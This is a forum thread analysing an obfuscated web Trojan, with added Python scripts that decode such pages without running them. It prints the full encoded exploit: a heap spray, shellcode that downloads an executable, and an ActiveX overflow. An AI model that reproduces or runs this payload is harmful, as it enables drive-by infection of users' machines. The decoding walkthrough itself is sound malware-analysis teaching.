Rising Kaka Security Forum

Brief Analysis of a Web Trojan Decoding Challenge (Prize Thread)
networkedition - 2009-6-3 9:22:00
Let's briefly analyse this encoded code. There are two ways to decode it; both are explained in detail below:

<script>
t="60,33,45,45,32,32,97,120,105,115,39,32,101,120,112,108,111,105,116,33,32,32,45,45,62,13,10,13,10,60,104,116,109,108,62,13,10,60,104,101,97,100,62,13,10,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,106,97,118,97,115,99,114,105,112,116,34,62,13,10,9,118,97,114,32,104,101,97,112,83,112,114,97,121,84,111,65,100,100,114,101,115,115,32,61,32,48,120,48,99,48,49,48,49,48,49,59,13,10,9,118,97,114,32,115,104,101,108,108,99,111,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,34,43,34,37,117,57,48,57,48,34,43,32,13,10,34,37,117,54,52,54,48,37,117,51,48,97,49,37,117,48,48,48,48,37,117,56,98,48,48,37,117,48,99,52,48,37,117,55,48,56,98,37,117,97,100,49,99,37,117,55,48,56,98,34,32,43,13,10,34,37,117,56,49,48,56,37,117,48,48,101,99,37,117,48,48,48,52,37,117,56,98,48,48,37,117,53,54,101,99,37,117,56,101,54,56,37,117,48,101,52,101,37,117,101,56,101,99,34,32,43,13,10,34,37,117,48,48,102,102,37,117,48,48,48,48,37,117,52,53,56,57,37,117,53,54,48,52,37,117,57,56,54,56,37,117,56,97,102,101,37,117,101,56,48,101,37,117,48,48,102,49,34,32,43,13,10,34,37,117,48,48,48,48,37,117,52,53,56,57,37,117,53,54,48,56,37,117,50,53,54,56,37,117,102,102,98,48,37,117,101,56,99,50,37,117,48,48,101,51,37,117,48,48,48,48,34,32,43,13,10,34,37,117,52,53,56,57,37,117,53,54,48,99,37,117,101,102,54,56,37,117,101,48,99,101,37,117,101,56,54,48,37,117,48,48,100,53,37,117,48,48,48,48,37,117,52,53,56,57,34,32,43,13,10,34,37,117,53,54,49,48,37,117,99,49,54,56,37,117,101,53,55,57,37,117,101,56,98,56,37,117,48,48,99,55,37,117,48,48,48,48,37,117,52,53,56,57,37,117,52,48,49,52,34,32,43,13,10,34,37,117,51,56,56,48,37,117,55,53,99,51,37,117,56,57,102,97,37,117,49,56,52,53,37,117,48,56,101,57,37,117,48,48,48,49,37,117,53,101,48,48,37,117,55,53,56,57,34,32,43,13,10,34,37,117,56,98,50,52,37,117,48,52,52,53,37,117,48,49,54,97,37,117,56,98,53,57,37,117,49,56,53,53,37,117,101,56,53,54,37,117,48,48,56,99,37,117,48,48,48,48,34,32,43,13,10,34,37,117,54,56,53,48,37,117,49,97,51,54,37,117,55
,48,50,102,37,117,57,56,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,99,52,53,37,117,99,53,56,98,34,32,43,13,10,34,37,117,99,48,56,51,37,117,56,57,53,48,37,117,50,48,52,53,37,117,102,102,54,56,37,117,48,48,48,48,37,117,53,48,48,48,37,117,52,53,56,98,37,117,54,97,49,52,34,32,43,13,10,34,37,117,53,57,48,50,37,117,53,53,56,98,37,117,101,56,49,56,37,117,48,48,54,50,37,117,48,48,48,48,37,117,52,53,48,51,37,117,99,55,50,48,37,117,53,99,48,48,34,32,43,13,10,34,37,117,50,101,55,101,37,117,99,55,54,53,37,117,48,52,52,48,37,117,54,53,55,56,37,117,48,48,48,48,37,117,55,53,102,102,37,117,56,98,50,48,37,117,48,99,52,53,34,32,43,13,10,34,37,117,48,49,54,97,37,117,56,98,53,57,37,117,49,56,53,53,37,117,52,49,101,56,37,117,48,48,48,48,37,117,54,97,48,48,37,117,53,56,48,55,37,117,52,53,48,51,34,32,43,13,10,34,37,117,51,51,50,52,37,117,53,51,100,98,37,117,102,102,53,51,37,117,50,48,55,53,37,117,53,51,53,48,37,117,52,53,56,98,37,117,54,97,49,99,37,117,53,57,48,53,34,32,43,13,10,34,37,117,53,53,56,98,37,117,101,56,49,56,37,117,48,48,50,52,37,117,48,48,48,48,37,117,48,48,54,97,37,117,55,53,102,102,37,117,56,98,50,48,37,117,48,56,52,53,34,32,43,13,10,34,37,117,48,50,54,97,37,117,56,98,53,57,37,117,49,56,53,53,37,117,49,49,101,56,37,117,48,48,48,48,37,117,56,49,48,48,37,117,48,48,99,52,37,117,48,48,48,52,34,32,43,13,10,34,37,117,54,49,48,48,37,117,99,52,56,49,37,117,48,52,100,99,37,117,48,48,48,48,37,117,99,50,53,100,37,117,48,48,50,52,37,117,53,98,52,49,37,117,48,51,53,50,34,32,43,13,10,34,37,117,48,51,101,49,37,117,48,51,101,49,37,117,48,51,101,49,37,117,56,51,101,49,37,117,48,52,101,99,37,117,53,51,53,97,37,117,100,97,56,98,37,117,102,55,101,50,34,32,43,13,10,34,37,117,102,102,53,50,37,117,53,53,101,48,37,117,101,99,56,98,37,117,55,100,56,98,37,117,56,98,48,56,37,117,48,99,53,100,37,117,56,98,53,54,37,117,51,99,55,51,34,32,43,13,10,34,37,117,55,52,56,98,37,117,55,56,49,101,37,117,102,51,48,51,37,117,56,98,53,54,37,117,50,48,55,54,37,117,102,51,48,51,37,117,99,57,51,51,37,117,5
2,49,52,57,34,32,43,13,10,34,37,117,48,51,97,100,37,117,53,54,99,51,37,117,102,54,51,51,37,117,98,101,48,102,37,117,51,97,49,48,37,117,55,52,102,50,37,117,99,49,48,56,37,117,48,100,99,101,34,32,43,13,10,34,37,117,102,50,48,51,37,117,101,98,52,48,37,117,51,98,102,49,37,117,53,101,102,101,37,117,101,53,55,53,37,117,56,98,53,97,37,117,56,98,101,98,37,117,50,52,53,97,34,32,43,13,10,34,37,117,100,100,48,51,37,117,56,98,54,54,37,117,52,98,48,99,37,117,53,97,56,98,37,117,48,51,49,99,37,117,56,98,100,100,37,117,56,98,48,52,37,117,99,53,48,51,34,32,43,13,10,34,37,117,53,100,53,101,37,117,48,56,99,50,37,117,101,56,48,48,37,117,102,101,102,51,37,117,102,102,102,102,37,117,53,50,53,53,37,117,52,100,52,99,37,117,52,101,52,102,34,32,43,13,10,34,37,117,54,56,48,48,37,117,55,52,55,52,37,117,51,97,55,48,37,117,50,102,50,102,37,117,55,55,55,55,37,117,50,101,55,55,37,117,55,55,54,100,37,117,50,101,55,50,34,32,43,13,10,34,37,117,54,102,54,55,37,117,50,101,55,54,37,117,54,101,54,51,37,117,54,97,50,102,37,117,55,55,55,51,37,117,50,102,54,100,37,117,54,101,52,57,37,117,55,52,54,53,34,32,43,13,10,34,37,117,55,53,55,48,37,117,54,53,54,102,37,117,54,53,50,101,37,117,54,53,55,56,37,117,48,48,48,48,34,41,59,13,10,13,10,118,97,114,32,104,101,97,112,66,108,111,99,107,83,105,122,101,32,61,32,48,120,49,48,48,48,48,48,59,13,10,118,97,114,32,112,97,121,76,111,97,100,83,105,122,101,32,61,32,115,104,101,108,108,99,111,100,101,46,108,101,110,103,116,104,32,42,32,50,59,13,10,118,97,114,32,115,112,114,97,121,83,108,105,100,101,83,105,122,101,32,61,32,104,101,97,112,66,108,111,99,107,83,105,122,101,32,45,32,40,112,97,121,76,111,97,100,83,105,122,101,43,48,120,51,56,41,59,13,10,118,97,114,32,115,112,114,97,121,83,108,105,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,34,41,59,13,10,115,112,114,97,121,83,108,105,100,101,32,61,32,103,101,116,83,112,114,97,121,83,108,105,100,101,40,115,112,114,97,121,83,108,105,100,101,44,115,112,114,97,121,83,108,105,100,101,83,105
,122,101,41,59,13,10,104,101,97,112,66,108,111,99,107,115,32,61,32,40,104,101,97,112,83,112,114,97,121,84,111,65,100,100,114,101,115,115,32,45,32,48,120,49,48,48,48,48,48,41,47,104,101,97,112,66,108,111,99,107,83,105,122,101,59,13,10,109,101,109,111,114,121,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,13,10,13,10,102,111,114,32,40,105,61,48,59,105,60,104,101,97,112,66,108,111,99,107,115,59,105,43,43,41,13,10,123,13,10,9,9,109,101,109,111,114,121,91,105,93,32,61,32,115,112,114,97,121,83,108,105,100,101,32,43,32,115,104,101,108,108,99,111,100,101,59,13,10,125,13,10,102,117,110,99,116,105,111,110,32,103,101,116,83,112,114,97,121,83,108,105,100,101,40,115,112,114,97,121,83,108,105,100,101,44,32,115,112,114,97,121,83,108,105,100,101,83,105,122,101,41,13,10,123,13,10,9,119,104,105,108,101,32,40,115,112,114,97,121,83,108,105,100,101,46,108,101,110,103,116,104,42,50,60,115,112,114,97,121,83,108,105,100,101,83,105,122,101,41,13,10,9,123,13,10,9,9,115,112,114,97,121,83,108,105,100,101,32,43,61,32,115,112,114,97,121,83,108,105,100,101,59,13,10,9,125,13,10,9,115,112,114,97,121,83,108,105,100,101,32,61,32,115,112,114,97,121,83,108,105,100,101,46,115,117,98,115,116,114,105,110,103,40,48,44,115,112,114,97,121,83,108,105,100,101,83,105,122,101,47,50,41,59,13,10,9,114,101,116,117,114,110,32,115,112,114,97,121,83,108,105,100,101,59,13,10,125,13,10,13,10,60,47,115,99,114,105,112,116,62,13,10,13,10,60,115,99,114,105,112,116,62,13,10,102,117,110,99,116,105,111,110,32,100,111,84,101,115,116,40,41,13,10,123,13,10,9,99,111,109,46,76,97,117,110,99,104,80,50,80,83,104,97,114,101,40,34,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,
65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,66,66,66,66,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,4
8,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,34,44,32,49,48,48,48,48,41,59,13,10,13,10,125,13,10,60,47,115,99,114,105,112,116,62,13,10,60,47,104,101,97,100,62,13,10,60,79,66,74,69,67,84,32,73,68,61,34,99,111,109,34,32,67,76,65,83,83,73,68,61,34,67,76,83,73,68,58,123,65,67,51,65,51,54,65,56,45,57,66,70,70,45,52,49,48,65,45,65,51,51,68,45,50,50,55,57,70,70,69,66,54,57,68,50,125,34,62,60,47,79,66,74,69,67,84,62,13,10,60,115,99,114,105,112,116,62,106,97,118,97,115,99,114,105,112,116,58,100,111,84,101,115,116,40,41,59,60,47,115,99,114,105,112,116,62,13,10,60,47,104,116,109,108,62,13,10"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>


1. First look at the long run of digits after t=: they are all Arabic numerals between 0 and 10, with no letters. This is in fact decimal encoding, and this kind of radix-based encoding was very common in early web Trojan obfuscation.

2. Now that we have established it is decimal encoding, how do we decode it? We can use an online decoding tool. Specifically, copy the long run of digits after t= and paste it into the online decoder's input area. See the screenshot:



Note: copy only the long run of digits after t= and remove all other characters.

networkedition - 2009-6-3 9:23:00
The image below shows the decoded result. We can see that the decoded result is actually a piece of shellcode; next, copy the shellcode portion that is to be decoded:


%u9090"+"%u9090"+
"%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b" +
"%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec" +
"%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1" +
"%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000" +
"%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589" +
"%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014" +
"%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589" +
"%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000" +
"%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b" +
"%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14" +
"%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00" +
"%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45" +
"%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503" +
"%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905" +
"%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845" +
"%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004" +
"%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352" +
"%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2" +
"%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73" +
"%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149" +
"%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce" +
"%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a" +
"%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503" +
"%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f" +
"%u6800%u7474%u3a70%u2f2f%u7777%u2e77%u776d%u2e72" +
"%u6f67%u2e76%u6e63%u6a2f%u7773%u2f6d%u6e49%u7465" +
"%u7570%u656f%u652e%u6578%u0000"


networkedition - 2009-6-3 9:23:00
This shellcode contains a lot of punctuation and arithmetic symbols, so let's tidy it up a bit. A small trick: paste the shellcode into Notepad and use the Replace function (freshow's replace function also works) to replace the unnecessary characters with nothing (leave the replacement field empty; note: not a space character). This is a method used frequently in everyday decoding work.


%u9090%u9090
%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b
%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec
%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1
%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000
%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589
%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014
%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589
%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000
%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b
%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14
%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00
%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45
%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503
%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905
%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845
%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004
%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352
%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2
%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73
%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149
%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce
%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a
%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503
%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f
%u6800%u7474%u3a70%u2f2f%u7777%u2e77%u776d%u2e72
%u6f67%u2e76%u6e63%u6a2f%u7773%u2f6d%u6e49%u7465
%u7570%u656f%u652e%u6578%u0000


Paste the tidied shellcode into freshow's input area and decode it with esc twice to obtain the web Trojan's address: hxxp://www.mwr.gov.cn/jswm/Inetpuoe.exe
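The tidy-up step above (removing quotes, plus signs and line breaks) and the freshow decoding that follows can be done offline with a short script. The following is an added example, not code from the original post or from freshow: it strips the concatenation noise, decodes the %u chunks the way JavaScript's unescape() lays them out in memory (16-bit code units, low byte first), and then lists the printable ASCII runs so an embedded download URL stands out. SAMPLE is constructed for this example and is not the thread's shellcode: it is a short NOP sled followed by the text "URLMON" and the placeholder URL http://example.invalid/a.exe.

```python
"""Added example (not part of the forum post): tidy a shellcode string pasted
out of a JavaScript page and decode it the way unescape() does, then list the
printable ASCII strings so an embedded download URL stands out.

SAMPLE below is constructed for this example; it is a NOP sled followed by the
text "URLMON" and a placeholder URL, not the shellcode from the thread."""
import re

# Constructed sample, in the noisy form seen when copying from the page source:
# string-literal quotes, '+' concatenation and line breaks between %u chunks.
SAMPLE = '''%u9090"+"%u9090"+
"%u5255%u4d4c%u4e4f%u6800%u7474%u3a70%u2f2f%u7865" +
"%u6d61%u6c70%u2e65%u6e69%u6176%u696c%u2f64%u2e61" +
"%u7865%u0065"'''

# The characters the post removes by hand with Notepad's Replace.
_NOISE = re.compile(r'["\'+\s]')
_ESCAPE = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')


def clean_shellcode(text: str) -> str:
    """Strip quotes, plus signs and whitespace, leaving only the %u chunks."""
    return _NOISE.sub("", text)


def js_unescape(s: str) -> bytes:
    """Decode a cleaned %uXXXX / %XX string to bytes.

    unescape() yields one 16-bit code unit per escape; in the process's memory
    (and so in a sprayed heap) each unit is stored little-endian, low byte
    first. Anything that is not a well-formed escape is an error rather than
    being skipped, so a mangled paste is noticed instead of silently decoded."""
    out = bytearray()
    pos = 0
    for m in _ESCAPE.finditer(s):
        if m.start() != pos:
            raise ValueError(f"unexpected text at offset {pos}: {s[pos:m.start()]!r}")
        code = int(m.group(1) or m.group(2), 16)
        out += code.to_bytes(2, "little")
        pos = m.end()
    if pos != len(s):
        raise ValueError(f"trailing text at offset {pos}: {s[pos:]!r}")
    return bytes(out)


def printable_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return runs of printable ASCII of at least min_len bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def nop_sled_length(data: bytes) -> int:
    """Count leading 0x90 (NOP) bytes, the %u9090 padding at the start of the blob."""
    return len(data) - len(data.lstrip(b"\x90"))


def analyse(raw: str) -> dict:
    """Full pipeline: tidy, decode, and summarise what a defender wants to know."""
    data = js_unescape(clean_shellcode(raw))
    return {
        "size": len(data),
        "nop_sled": nop_sled_length(data),
        "strings": printable_strings(data),
    }


if __name__ == "__main__":
    result = analyse(SAMPLE)
    print(f"{result['size']} bytes, {result['nop_sled']} leading NOPs")
    for s in result["strings"]:
        print("  ", s)
```

Running it on SAMPLE reports 40 bytes with a 4-byte NOP sled and the two strings "URLMON" and the placeholder URL; the byte-pairing in js_unescape is why "URLMON" appears in the page's blob as %u5255%u4d4c%u4e4f rather than in reading order.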
networkedition - 2009-6-3 9:23:00
Next, the second decoding method. We can see that this encoded code contains two functions we are familiar with, eval and document.write, and we already know how to decode both of these encoding forms. So which one should be replaced with alert? Let's analyse it briefly.

t=eval("String.fromCharCode("+t+")");
document.write(t)

String.fromCharCode converts ASCII codes into a string, and eval then parses that string as JavaScript statements and executes them.

We should now roughly understand what these two statements do. Here we only need to replace document.write with alert, save the file as .htm and run it directly to obtain the shellcode from method one. The rest of the decoding is the same as in method one and is not covered again in detail here.
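Both method one (copy the digits after t= into a decoder) and method two (swap document.write for alert and open the page) come down to the same operation: rebuild the text that String.fromCharCode would produce and read it instead of letting eval run it. The following is an added example, not code from the original post: it pulls the decimal literal out of the page source, decodes it with the same 16-bit char-code semantics as String.fromCharCode, refuses damaged input rather than producing a subtly wrong layer, and flags the tokens a defender looks for in the next layer. SAMPLE_PAGE is constructed for this example; its decimal list encodes a short, harmless script tag, not the thread's payload.

```python
"""Added example (not part of the forum post): the static version of method two.
Instead of swapping document.write for alert and opening the page in a
browser, pull the decimal list out of the page source and rebuild the text the
way String.fromCharCode would, so the next layer is read, never executed.

SAMPLE_PAGE is constructed for this example: its decimal list encodes a short,
harmless <script> tag, not the thread's payload."""
import re

# Constructed sample page in the same shape as the one in the thread.
SAMPLE_PAGE = (
    '<script>\n'
    't="60,115,99,114,105,112,116,62,120,61,117,110,101,115,99,97,112,101,40,34,'
    '37,117,57,48,57,48,37,117,57,48,57,48,34,41,59,60,47,115,99,114,105,112,116,62"\n'
    't=eval("String.fromCharCode("+t+")");\n'
    'document.write(t);</script>'
)

# Tokens worth flagging in a decoded layer; the decoded page in the thread
# shows unescape("%u...") blobs, a heap spray and an OBJECT tag with a CLSID.
MARKERS = ("unescape(", "%u", "shellcode", "heapSpray", "eval(", "document.write(", "CLSID:")

_CHARCODE_LITERAL = re.compile(r'\bt\s*=\s*"([0-9,\s]+)"')


def extract_charcode_string(script: str) -> str:
    """Return the digits-and-commas literal assigned to t (what the post copies by hand)."""
    m = _CHARCODE_LITERAL.search(script)
    if m is None:
        raise ValueError('no t="<decimal list>" literal found')
    return m.group(1)


def decode_charcodes(t: str) -> str:
    """Rebuild the text exactly as String.fromCharCode(...) would, without eval.

    Each comma-separated field must be a decimal number in the 16-bit range;
    anything else means the copied list is damaged, and the function says so
    instead of producing a subtly wrong layer."""
    chars = []
    for field in t.split(","):
        field = field.strip()
        if not field.isdigit():
            raise ValueError(f"not a decimal char code: {field!r}")
        code = int(field)
        if code > 0xFFFF:
            raise ValueError(f"char code {code} does not fit in 16 bits")
        chars.append(chr(code))
    return "".join(chars)


def suspicious_markers(decoded: str) -> list[str]:
    """List which MARKERS occur in a decoded layer, in MARKERS order."""
    return [m for m in MARKERS if m in decoded]


def decode_page(script: str) -> dict:
    """Extract, decode and summarise one layer of a decimal-charcode page."""
    decoded = decode_charcodes(extract_charcode_string(script))
    return {"decoded": decoded, "markers": suspicious_markers(decoded)}


if __name__ == "__main__":
    result = decode_page(SAMPLE_PAGE)
    print(result["decoded"])
    print("markers:", ", ".join(result["markers"]))
```

On the real page the decoded layer is the HTML with the unescape("%u...") shellcode string, which is then fed to the %u decoder from the previous step; running decode_page in a loop until no more markers appear peels multi-layer samples without ever opening them in a browser.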
09kaka - 2009-6-3 10:28:00
Learned something~ Followed the method and decoded it successfully :kaka12: